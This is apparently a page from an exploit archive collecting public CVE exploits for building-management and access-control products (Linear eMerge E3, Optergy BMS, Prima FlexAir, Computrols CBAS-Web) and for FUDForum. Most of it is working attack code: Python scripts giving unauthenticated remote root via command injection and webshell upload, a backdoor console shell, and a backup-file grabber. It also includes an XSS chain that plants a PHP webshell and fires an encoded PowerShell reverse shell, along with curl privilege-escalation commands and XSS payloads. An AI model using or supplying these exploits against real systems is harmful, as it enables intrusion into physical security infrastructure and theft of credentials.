Nortek Linear eMerge E3 suffers from a cross site request forgery vulnerability.

MD5 | f71c4e9823f6f1c6a4f6c324fdf7a349


Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery

CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic







































Source

Prima FlexAir Access Control version 2.3.35 database backup predictable name exploit.

MD5 | 1549dfc10ce0890c7b4cd26ea0d2fab6

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# CVE: CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#

import os#######
import sys######
import time#####
import requests#

from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '[+] Usage: '+piton+' [target]'
print '[+] Target example 1: http://10.0.0.17:8080'
print '[+] Target example 2: https://primanova.tldn'
sys.exit()

host = sys.argv[1]

def datum(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)

start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print '[+] Please wait while fetchin the backup config file...'

def spinning_cursor():
while True:
for cursor in '|/-\':
yield cursor

spinner = spinning_cursor()

for mooshoo in datum(start_date, end_date):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('b')
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)

if (h.status_code) == 200:
print '[+] Found some juice!'
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
timestr = time.strftime('%H%M%S')
time.sleep(1)
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
sys.exit()

print '[-] No backup for you today. :('

Source

FUDForum version 3.0.9 suffers from remote code execution and stored cross site scripting vulnerabilities.

MD5 | 85fcbef86c0f69e85d73a2d8f71402a2

// Exploit Title         : FUDForum 3.0.9 - Stored XSS / Remote Code Execution
// Date : 10/26/19
// Exploit Author : liquidsky (JMcPeters)
// Vulnerable Software : FUDForum 3.0.9
// Vendor Homepage : https://sourceforge.net/projects/fudforum/
// Version : 3.0.9
// Software Link : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
// Tested On : Windows / mysql / apache
// Author Site : https://github.com/fuzzlove/FUDforum-XSS-RCE
// Demo : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
// CVE : CVE-2019-18839, CVE-2019-18873
//
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

function patience()
{
var u=setTimeout("grabShell()",5000);
}

// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell()
{
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.send(null);

}

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

// Send the proper header information along with the request
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
var fileName = "liquidsky.php";
var url = "/fudforum/adm/admbrowse.php";
var ctype = "application/x-php";
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '
'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '

'; die; }?>";
var boundary = "-----------------------------9703186584101745941654835853";
var fileSize = fileData.length;

var body = "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="cur"rnrn';
body += currentdir + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="SQ"rnrn';
body += token + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"rn';
body += "Content-Type: " + ctype + "rnrn";
body += fileData + "rnrn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="tmp_f_val"rnrn';
body += "1" + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="d_name"rnrn';
body += fileName + "rn";
body += "--" + boundary + "rn";
body += 'Content-Disposition: form-data; name="file_upload"rnrn';
body += "Upload File" + 'rn';
body += "--" + boundary + "--";

xhr.send(body);
}

//Grab SQ token
var req = new XMLHttpRequest();

req.onreadystatechange=function()
{
if (req.readyState == 4 && req.status == 200) {
var htmlPage = req.responseXML; /* fetch html */
var SQ = htmlPage.getElementsByTagName("input")[0]
submitFormWithTokenJS(SQ.value);
}
}

req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();

patience();

Source

Linear eMerge E3 versions 1.00-06 and below suffer from a privilege escalation vulnerability.

MD5 | e87096213609cedfeb448ae0ae5459f5


Linear eMerge E3 Privilege Escalation
Affected version: <=1.00-06
CVE: CVE-2019-7258, CVE-2019-7259
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


Escalate:

curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1


Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1

Source

Optergy BMS versions 2.0.3a and below account reset and username disclosure exploit.

MD5 | a1f66a4c127348cbe47ec39981351c17


Optergy BMS Account Reset and Username Disclosure

Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic

CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008

PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
djuro
teppi
view
alerton
stef
humba
drmio
de3
andri
myko
dzonka
kosto
beebee
Administrator

Source

Optergy BMS versions 2.0.3a and below unauthenticated remote root exploit. Related CVE number: CVE-2019-7276.

MD5 | 828db05389246ed7db50064512079555

#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# CVE: CVE-2019-7276
# Advisory: https://applied-risk.com/resources/ar-2019-008
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os#######
import sys######
import json#####
import hashlib##
import requests#

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

while True:

challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'

try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge

hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2

zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
zeCommand = raw_input('# ')
if zeCommand.strip() == 'exit':
sys.exit()
zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
'Accept' : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'command' : 'sudo '+zeCommand,
'challenge' : challenge,
'answer' : h1+h2}

zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
get_resp = json.loads(zeRequest.text)
get_answ = get_resp['response']['message']
print get_answ
except Exception:
print '[*] Error!'
break

Source

Computrols CBAS-Web versions 19.0.0 and below suffer from a reflective cross site scripting vulnerability.

MD5 | 98ed5bd8f8a9dd9b41007dd8458f785d


Computrols CBAS-Web Unauthenticated Reflected XSS

Affected versions: 19.0.0 and below
CVE: CVE-2019-10846
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic

--

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username=">confirm(document.cookie)&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=">htmlinjection&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username=">my milkshake brings all the boys to the yard.&password=damn_right HTTP/1.1

Source

Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.

MD5 | 44a9793e2a7284d735e5ee358d786e4b

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '''
.....
.e$$$$$$$$$$$$$$e.
z$$ ^$$$$$$$$$$$$$$$$$.
.$$$* J$$$$$$$$$$$$$$$$$$$e
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
.$ $$$$$$$$$$$$$$$$***$$ .ee"
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -e$$ 4$$$$. .ze$$$""""
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
z$$" $$ $$$$P*"" J$*$$c
$$" $$F .$$$ $$ ^$$
$$ *$$c.z$$$ $$ $$
$P $$$$$$$ 4$F 4$
dP *$$$" $$ '$r
.$ J$" $"
$ $P 4$
F $$ 4$
4$% 4$
$$ 4$
d$" $$
$P $$
$$ $$
4$% $$
$$ $$
d$ $$
$F "3
r=4e=" ... ..rf . ""%
$**$*"^""=..^4*=4=^"" ^"""
'''
print 'nx20x20[+] Linear eMerge E3 Remote Root Exploit'
print 'x20x20[-] by lqwrm (c) 2019'
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
showme = requests.get('http://'+ipaddr+'/test.txt')
print showme.text

while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
#time.sleep(1);
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!n"
break
else: continue
except Exception:
break

sys.exit()

Source

Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan.php.

MD5 | 6bc7028052702f5b76c1733414371eb8

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print 'nx20x20[*] Usage: '+piton+' n'
sys.exit()

ipaddr = sys.argv[1]

print
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!n"
break
else: continue
except Exception:
break

sys.exit()

Source

Linear eMerge E3 versions 1.00-06 and below arbitrary file upload remote root code execution exploit.

MD5 | 7cb54d49b3539c9a3b2258832481a863

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
print "nx20x20[*] Usage: "+piton+" n"
sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
try:
target = "http://"+ipaddr+badge

headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}

payload = ("------jrnContent-Disposition: form-da"
"ta; name="layout_name"rnrnwebshel"
"l.phprn------jrnContent-Disposition"
": form-data; name="bg"; filename="we"
"bshell.php"rnContent-Type: applicati"
"on/octet-streamrnrn<?nif($_GET['cm"
"d']) {n system($_GET['cmd']);n }n?"
">nrn------j--rn")

requests.post(target, headers=headers, data=payload)

cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
print execute.text
if cmd.strip() == "exit":
print "[+] Deleting webshell.php file..."
requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
print "[+] Done!n"
break
else: continue
except Exception:
print "Error!"
break

sys.exit()

Source